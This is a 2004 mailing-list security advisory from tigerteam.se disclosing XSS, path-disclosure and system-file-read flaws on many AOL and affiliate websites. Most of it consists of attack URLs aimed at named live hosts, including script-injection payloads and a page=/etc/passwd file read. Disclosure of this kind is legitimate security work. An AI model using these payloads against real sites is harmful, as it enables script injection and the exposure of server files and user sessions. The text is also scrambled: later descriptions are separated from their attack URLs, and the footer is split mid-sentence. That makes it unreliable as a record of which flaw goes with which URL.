[Full-Disclosure] Multiple vulnerabilities in AOL and AOL affiliate web sites
From: Michel Blomgren (michel.blomgren_at_tigerteam.se)
Date: 12/26/04
- Previous message: sudhakar+fulldisclosure_at_CS.Princeton.EDU: "[Full-Disclosure] Any study on patch availability?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com Date: Sun, 26 Dec 2004 18:58:57 +0100
tigerteam.se security advisory - TSEAD-200412-2
www.tigerteam.se
Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
Date: Sat Dec 18 15:47:40 EST 2004
Application: Multiple AOL web applications were found to be vulnerable
Vulnerability: XSS, Path disclosure, and system file read access
vulnerabilities
Reference: TSEAD-200412-2
Author: Xavier de Leon <xavier@tigerteam.se>
SYNOPSIS
http://www.corp.aol.com/whoweare/mission.shtml
VULNERABILITY
The AOL and AOL affiliate web sites have similar coding practices in some
specific cases, and suffer from the same or similar vulnerabilities.
COMMENT
I literally went link to link, choosing scripts at random and manually testing
for input validation bugs, XSS, and so on. And so I assume the number of bugs
is actually greater.
DISCOVERY
Xavier de Leon <xavier@tigerteam.se>
EXPLOITATION
1) Description: multiple XSS attacks in "report.adp" script:
Attack: a)
http://www.aim.com/help_faq/report.adp?type=><script>alert("fubar")</script>
b)
http://www.aim.com/help_faq/report.adp?plat=><script>alert("fubar")</script>
c)
http://www.aim.com/help_faq/report.adp?num=><script>alert("fubar")</script>
d)
http://www.aim.com/help_faq/report.adp?ver=><script>alert("fubar")</script>
e)
http://www.aim.com/help_faq/report.adp?aolp=><script>alert("fubar")</script>
2) Description: XSS attack in help_faq/starting_out's "index.asp" script:
Attack: a)
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert("fubar")</script>
3) Description: XSS attack in "catId" variables on multiple .adp scripts:
Attack: a)
http://help.channels.aol.com/article.adp?catId="><script>alert("fubar")</script>&articleId=0
b)
help.channels.aol.com/topic.adp?catId="><script>alert("fubar")</script>&sCId=0
4) Description: Input validation attacks and path disclosure in "file_id"
variable over multiple scripts:
Attack: a) http://downloads.aol.com.br/files/incr.php?file_id=-0
b) http://downloads.aol.com.br/arquivo.php?file_id=(
5) Description: Input validation attacks and path disclosure in
"busca_resultado.php" script:
Attack: a) http://downloads.aol.com.br/busca_resultado.php?search_string='
6) Description: Input validation attacks and path disclosure in
"subcategoria.php" script:
Attack: a) http://downloads.aol.com.br/subcategoria.php?cat_subs_id='
7) Description: Path disclosure in "wa" script, part of listserv package.
Attack: a) http://listserv.aol.com/cgi-bin/wa?A2=/bar&L=foo&P=R1
8) Description: XSS attack in "main_redesign.adp" script:
Attack: a)
http://aimtoday.aol.com/features/main_redesign.adp?fid="><script>alert("fubar")</script>
9) Description: XSS attack in "price_plan.adp" script:
Attack: a)
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=&brand="><script>alert("fubar")</script>
b)
http://www.aol.ca/tryaol/price_plan.adp?wr_promo="><script>alert("fubar")</script>&brand=
10) Description: XSS and Path disclosure attack in "object.adp" script:
Attack: a)
http://finance.channels.aol.ca/finance/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
b)
http://women.channels.aol.ca/preview/object.adp?frame=&type=&id=---!><script>alert("fubar")</script><!---&data=
c)
http://sports.channels.aol.ca/sports/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
11) Description: Path disclosures in multiple aol.com.ar scripts:
Attack: a) http://foros.aol.com.ar/foro.php3?id_foro='
b) http://foros.aol.com.ar/toplevel.php3?id_top='
c) http://foros.aol.com.ar/categorias.php3?id_cat='
d) http://foros.aol.com.ar/subcategoria.php3?id_subcat='
12) Description: XSS attacks in "zonalibre.adp" script:
13) Description: XSS attacks in "computacion.adp" script:
14) Description: XSS attack in "aolenvivo.adp" script:
15) Description: XSS attack in "noticias.adp" script:
16) Description: XSS attack in "musica.adp" script:
17) Description: XSS attack in "deportes.adp" script:
18) Description: XSS attack in "entretenimientos.adp" script:
19) Description: System file read access vulnerability in "index.adp" script:
20) Description: Path disclosure and XSS attack in "holidaydetails.asp"
21) Description: Path disclosure attacks in "flightreturnsearch.asp" script:
ACKNOWLEDGMENTS
I would like to thank the following people in no particular order:
ABOUT TIGERTEAM.SE
tigerteam.se offers spearhead competence within the areas of vulnerability
_______________________________________________
Attack: a)
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=&Id="><script>alert("fubar")</script><!---
b)
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=
Attack: a)
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=
b)
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=&ID="><script>alert("fubar")</script><!---
Attack: a)
http://www.aol.com.ar/CanalesWeb/aolenvivo.adp?Canal=
Attack: a)
http://aol.com.ar/CanalesWeb/noticias.adp?Canal=
Attack: a)
http://aol.com.ar/CanalesWeb/musica.adp?Canal=
Attack: a)
http://www.aol.com.ar/CanalesWeb/deportes.adp?Canal=
Attack: a)
http://www.aol.com.ar/CanalesWeb/entretenimientos.adp?Canal=
Attack: a) http://www.aol.com.ar/Goyeneche/index.adp?page=/etc/passwd
script:
Attack: a)
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId='
Attack: b)
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId="><script>alert("fubar")</script><!---
Attack: a)
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTStartDate1Month='
b)
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTEndDate1Month='
Michel + all my brothers in p-e and uDc, you know who you are.
assessment, penetration testing, security implementation, and advanced ethical
hacking training. tigerteam.se consists of Michel Blomgren - company owner (M.
Blomgren IT Security) and Xavier de Leon - freelancing IT security consultant.
Together we have worked for organizations in over 15 countries.
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Relevant Pages
... fully-featured message board system with admin interface. ... flaws it is possible for the remote attacker to conduct XSS attacks. ... This vulnerability can be exploited only when PHP register_globals is ... Vulnerability Impact: Attack ...
(Full-Disclosure)
... Apache Server HTML Injection and UTF-7 XSS Vulnerability ... This vulnerability was found by Yaniv Miron and Yossi Yakubov. ... This string is combined from HTML Injection and a XSS string coded in UTF-7. ... We leave it to other hackers to upgrade the attack and make it fully automatic. ...
(Bugtraq)
... Cute Guestbook Remote XSS Exploit - ... Vulnerability / Exploit: ... The applications Cute Guestbook is vulnerable to an XSS Attack. ...
(Bugtraq)
... XSS vulnerabilities in Google.com ... Two XSS vulnerabilities were identified in the Google.com website, ... Although Google uses common XSS countermeasures, a successful attack ... The server response lacks charset encoding enforcement, ...
(Pen-Test)
... didn't carry through CERT- While Mikael was nice enough to code up "proof ... instead of the "produce attack code and announce the problem method.) ... but frankly all these folks (indeed also IPF) are his ... I'm willing to admit the risk assessment and the vulnerability ...
(Firewall-Wizards)
